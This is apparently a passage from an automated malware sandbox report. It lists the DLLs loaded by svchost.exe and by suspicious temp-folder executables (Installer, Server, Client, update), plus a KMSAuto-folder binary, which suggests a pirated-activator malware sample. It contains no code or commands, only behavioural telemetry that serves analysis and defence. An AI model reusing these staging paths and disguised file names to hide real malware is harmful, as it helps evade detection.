                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeSection loaded: userenv.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: apphelp.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: version.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: windows.storage.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: wldp.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: profapi.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rasapi32.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rasman.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rtutils.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mswsock.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: winhttp.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: iphlpapi.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dhcpcsvc.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dwrite.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dnsapi.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: winnsi.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rasadhlp.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: fwpuclnt.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: secur32.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: schannel.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mskeyprotect.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ntasn1.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ncrypt.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ncryptsslp.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: msasn1.dll
                      Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: ucrtbase_clr0400.dll
